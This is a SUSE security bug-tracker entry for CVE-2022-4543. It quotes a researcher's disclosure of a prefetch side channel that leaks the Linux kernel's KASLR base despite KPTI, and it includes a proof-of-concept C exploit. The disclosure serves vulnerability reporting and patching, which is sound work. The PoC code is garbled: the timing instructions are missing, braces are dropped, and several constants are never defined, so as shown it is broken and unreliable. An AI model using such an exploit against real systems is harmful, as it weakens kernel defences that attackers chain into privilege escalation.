Bug 1206463 - (CVE-2022-4543) VUL-0: CVE-2022-4543: kernel: KASLR offset exposure even with KPTI
VUL-0: CVE-2022-4543: kernel: KASLR offset exposure even with KPTI
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
Other Other
: P3 - Medium : Normal
: ---
Assigned To: Michal Hocko
Security Team bot
Depends on:
  Show dependency treegraph
Reported: 2022-12-16 07:54 UTC by Thomas Leroy
Modified: 2023-01-31 05:23 UTC (History)
5 users (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Note You need to log in before you can comment on or make changes to this bug.
Comment 7 Robert Frohl 2022-12-19 08:50:58 UTC

Subject: CVE-2022-4543: KASLR Leakage Achievable even with KPTI through Prefetch Side-Channel

I've discovered that KPTI has implementation issues, allowing any local attacker to easily, quickly, and reliably leak KASLR base via prefetch side-channels based on TLB timing for Intel systems.

I currently have developed code samples that can reliably leak KASLR base using this technique in under a second under normal system conditions with kPTI, both on host and guest OSes (under KVM), on the following CPUs: Intel i5-8265U (Arch 6.0.12-hardened1-1-hardened), Intel i7-8750H, Intel i7-9750H (Ubuntu 5.15.0-56-generic host, custom 5.18.3 on guest), Intel i7-9700F (6.0.12-1-MANJARO), and Intel Xeon(R) CPU E5-2640 (5.10.0-19-amd64). I do not believe this affects AMD CPUs based on personal preliminary testing.

It is already known that systems without KPTI are vulnerable to prefetch side-channels for KASLR leakage. However, there seemed to be an assumption that KPTI/KAISER will provide enough isolation to prevent CPU side-channel attacks against KASLR. 

This turns out to not be the case due to what KPTI leaves in userspace mappings. The code under entry_SYSCALL_64 is still mapped into userspace to handle syscalls, and the virtual address mapping is at a constant offset to kernel base. An attacker can repeatedly make syscalls to force that page into the TLB, and then perform the prefetch side-channel to figure out the address of entry_SYSCALL_64, which will break KASLR. This is because prefetch executes faster when a virtual address is in the TLB and avoids a page table walk, and the entry for that page isn't flushed out upon CR3 write due to it having the global bit.

Based on early discussions with security@...nel.org and linux-distros@...openwall.org, this behavior is unintended and might even be a regression in KPTI's implementation. A fix for this is currently not available.

More information can be found at https://www.willsroot.io/2022/12/entrybleed.html. The following is a primitive demonstration code that leaks KASLR base on systems with KPTI with a high degree of reliability, compiled with gcc using -static and -no-pie (entry_SYSCALL_64_offset has to be adjusted based on kernel by setting it to the distance between it and startup_64):

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

#define KERNEL_LOWER_BOUND 0xffffffff80000000ull
#define KERNEL_UPPER_BOUND 0xffffffffc0000000ull
#define entry_SYSCALL_64_offset 0x400000ull

uint64_t sidechannel(uint64_t addr) {
  uint64_t a, b, c, d;
  asm volatile (".intel_syntax noprefix;"
    "mov %0, rax;"
    "mov %1, rdx;"
    "xor rax, rax;"
    "prefetchnta qword ptr [%4];"
    "prefetcht2 qword ptr [%4];"
    "xor rax, rax;"
    "mov %2, rax;"
    "mov %3, rdx;"
    : "=r" (a), "=r" (b), "=r" (c), "=r" (d)
    : "r" (addr)
    : "rax", "rbx", "rcx", "rdx");
  a = (b << 32) | a;
  c = (d << 32) | c;
  return c - a;

#define STEP 0x100000ull
#define SCAN_END KERNEL_UPPER_BOUND + entry_SYSCALL_64_offset

#define ITERATIONS 100

uint64_t leak_syscall_entry(void) 
    uint64_t data[ARR_SIZE] = {0};
    uint64_t min = ~0, addr = ~0;

    for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++)
        for (uint64_t idx = 0; idx < ARR_SIZE; idx++) 
            uint64_t test = SCAN_START + idx * STEP;
            uint64_t time = sidechannel(test);
            if (i >= DUMMY_ITERATIONS)
                data[idx] += time;

    for (int i = 0; i < ARR_SIZE; i++)
        data[i] /= ITERATIONS;
        if (data[i] < min)
            min = data[i];
            addr = SCAN_START + i * STEP;
        printf("%llx %ld\n", (SCAN_START + i * STEP), data[i]);

    return addr;

int main()
    printf ("KASLR base %llx\n", leak_syscall_entry() - entry_SYSCALL_64_offset);